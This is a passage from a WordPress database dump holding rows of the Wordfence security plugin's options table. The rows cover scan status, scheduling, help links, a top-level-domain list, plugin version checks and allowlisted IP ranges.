"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1629727416.831','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','22','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1629735630;300;51.195.195.167','yes'),('serverIP','1628980462;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1629489598','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1629727413','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--wgbh1c|lamborghini|motorcycles|playstation|progressive|xn--unup4y|redumbrella|williamhill|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--pssy2u|xn--q7ce6a|xn--3bst00m|xn--3ds443g|xn--3hcrj9c|xn--3pxu8k|xn--o3cw4h|xn--42c2d9a|xn--mxtq1m|xn--wgbl6a|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--9et52u|xn--czrs0t|xn--kput3i|xn--55qw42g|xn--55qx5d|xn--5tzm5g|xn--6frz82g|xn--80ao21a|xn--80aswg|xn--90a3ac|xn--9dbq2a|xn--9krt00a|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--czr694b|xn--czru2d|xn--d1acj3b|xn--efvy88h|xn--fjq720a|xn--flw351e|xn--g2xx48c|xn--y9a3aq|xn--fct429k|xn--gecrj9c|xn--jvr189m|xn--45br5cyl|xn--4dbrk0ce|xn--80adxhks|xn--80asehdb|xn--8y0a063a|xn--gckr3f0f|xn--gk3at1e|xn--rhqv96g|xn--rovu88b|xn--3e0b707e|xn--xhq521b|travelchannel|wolterskluwer|xn--s9brj9c|xn--ses554g|lplfinancial|xn--qcka1pmc|xn--t60b56a|versicherung|lifeinsurance|xn--vuq861b|xn--w4rs40l|xn--cckwcxetd|xn--zfr164b|weatherchannel|xn--80aqecdr1a|xn--eckvdtc9d|northwesternmutual|xn--fiq228c5hs|xn--fpcrj9c3d|travelersinsurance|xn--3oq18vl8pn36a|xn--fzc2c9e2c|xn--54b7fta0cc|xn--6qq986b3xl|xn--b4w605ferd|xn--fzys8d69uvgm|xn--tiq49xqyj|xn--ygbi2ammx|xn--bck1b9a5dre4c|xn--h2brj9c|xn--clchc0ea0b2g2a9gcd|xn--q9jyb4c|xn--yfro4i67o|xn--h2breg3eve|xn--h2brj9c8c|xn--io0a7i|xn--hxt814e|xn--j1aef|xn--j1amh|xn--imr513n|xn--j6w193g|xn--kprw13d|xn--kpry57d|xn--mgbbh1a|xn--mgb9awbf|xn--jlq480n2rg|xn--mgba3a3ejt|xn--lgbbat1ad8j|xn--mgbpl2fh|xn--jlq61u9w7b|xn--mgbayh7gpa|xn--mgbbh1a71e|xn--mgbca7dzdo|xn--mgba3a4f16a|xn--mgbab2bd|xn--mgbaam7a8h|xn--mgbaakc7dvf|xn--mgbah1a3hjkrd|xn--mgbai9azgqp6j|xn--mgbc0a9azcg|xn--mgba7c0bbn0a|xn--mgbgu82a|xn--mgbcpq6gpa1a|xn--mgbt3dhd|xn--mgberp4a5d4ar|xn--ngbc5azd|xn--kcrx77d1x4a|xn--mgbtx2b|xn--i1b6b1a6a2e|xn--mix891f|xn--nyqy26a|xn--otu796d|xn--mk1bu44c|xn--mgbi4ecexp|xn--ngbe9e0a|xn--mgbx4cd0ab|xn--nqv7fs00ema|xn--ogbpf8fl|xn--pgbs0dh|xn--rvc1e0am3e|xn--5su34j936bgsg|xn--w4r85el8fhu5dnra|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|','yes'),('tldlistHash','3694aa48ec18a722435a817d284b52e282d032d11ca43c36e94d9e03b5ca922a','yes'),('totalAlertsSent','4','yes'),('totalLoginHits','10100','yes'),('totalLogins','3','yes'),('totalScansRun','73','yes'),('touppBypassNextCheck','0','yes'),('touppPromptNeeded','1','yes'),('vulnerabilities_plugin','a:5:{i:0;a:4:{s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:11:\"fromVersion\";s:5:\"4.4.9\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:1;a:4:{s:4:\"slug\";s:11:\"hello-dolly\";s:11:\"fromVersion\";s:5:\"1.7.2\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:2;a:4:{s:4:\"slug\";s:11:\"redirection\";s:11:\"fromVersion\";s:5:\"5.1.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:3;a:4:{s:4:\"slug\";s:9:\"wordfence\";s:11:\"fromVersion\";s:5:\"7.5.5\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}i:4;a:4:{s:4:\"slug\";s:9:\"wp-cerber\";s:11:\"fromVersion\";s:5:\"8.9.3\";s:10:\"vulnerable\";b:0;s:4:\"link\";b:0;}}','yes'),('wafAlertInterval','600','yes'),('wafAlertOnAttacks','1','yes'),('wafAlertThreshold','100','yes'),('wafAlertWhitelist','','yes'),('waf_status','enabled','yes'),('wfKillRequested','0','no'),('wfPeakMemory','18874368','no'),('wfScanStartVersion','5.8','yes'),('wfsd_engine','','no'),('wfStatusStartMsgs','a:2:{i:0;s:0:\"\";i:1;s:0:\"\";}','yes'),('wf_scanLastStatusTime','0','yes'),('wf_scanRunning','','yes'),('wf_summaryItems','a:8:{s:12:\"scannedPosts\";i:0;s:15:\"scannedComments\";i:0;s:12:\"scannedFiles\";i:0;s:14:\"scannedPlugins\";i:0;s:13:\"scannedThemes\";i:0;s:12:\"scannedUsers\";i:0;s:11:\"scannedURLs\";i:0;s:10:\"lastUpdate\";i:1629727416;}','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('whitelistHash','bf3d76dc05caf8623cb3fe01c1fc9e308e2f2ea37b826937d850fde361cdefd4','yes'),('whitelistPresets','{\"wordfence\":{\"n\":\"Wordfence\",\"h\":true,\"d\":true,\"f\":true,\"r\":[\"54.68.32.247\",\"69.46.36.0\\/27\",\"2605:2400:0104:0100::\\/56\"]},\"sucuri\":{\"n\":\"Sucuri\",\"d\":true,\"r\":[\"97.74.127.171\",\"69.164.203.172\",\"173.230.128.135\",\"66.228.34.49\",\"66.228.40.185\",\"50.116.36.92\",\"50.116.36.93\",\"50.116.3.171\",\"198.58.96.212\",\"50.116.63.221\",\"192.155.92.112\",\"192.81.128.31\",\"198.58.106.244\",\"192.155.95.139\",\"23.239.9.227\",\"198.58.112.103\",\"192.155.94.43\",\"162.216.16.33\",\"173.255.233.124\",\"173.255.233.124\",\"192.155.90.179\",\"50.116.41.217\",\"192.81.129.227\",\"198.58.111.80\",\"162.216.19.183\"]},\"facebook\":{\"n\":\"Facebook\",\"d\":true,\"r\":[\"69.63.176.0\\/20\",\"66.220.144.0\\/20\",\"66.220.144.0\\/21\",\"69.63.184.0\\/21\",\"69.63.176.0\\/21\",\"74.119.76.0\\/22\",\"69.171.255.0\\/24\",\"173.252.64.0\\/18\",\"69.171.224.0\\/19\",\"69.171.224.0\\/20\",\"103.4.96.0\\/22\",\"69.63.176.0\\/24\",\"173.252.64.0\\/19\",\"173.252.70.0\\/24\",\"31.13.64.0\\/18\",\"31.13.24.0\\/21\",\"66.220.152.0\\/21\",\"66.220.159.0\\/24\",\"69.171.239.0\\/24\",\"69.171.240.0\\/20\",\"31.13.64.0\\/19\",\"31.13.64.0\\/24\",\"31.13.65.0\\/24\",\"31.13.67.0\\/24\",\"31.13.68.0\\/24\",\"31.13.69.0\\/24\",\"31.13.70.0\\/24\",\"31.13.71.0\\/24\",\"31.13.72.0\\/24\",\"31.13.73.0\\/24\",\"31.13.74.0\\/24\",\"31.13.75.0\\/24\",\"31.13.76.0\\/24\",\"31.13.77.0\\/24\",\"31.13.96.0\\/19\",